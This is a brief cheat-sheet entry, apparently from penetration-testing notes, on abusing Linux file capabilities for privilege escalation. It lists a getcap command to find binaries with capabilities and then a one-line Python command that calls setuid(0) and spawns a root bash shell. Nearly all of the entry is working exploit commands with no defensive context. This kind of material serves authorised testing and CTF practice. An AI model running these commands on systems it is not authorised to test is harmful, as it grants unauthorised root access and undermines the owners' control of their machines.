Capabilities
Similar to suid but more secure.
Enumeration
getcap -r / 2>/dev/null
Exploitation
In our example the command to enumerate gave us
/usr/bin/python2.6
We just need to run python with a command that will give us root
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Resources

Last updated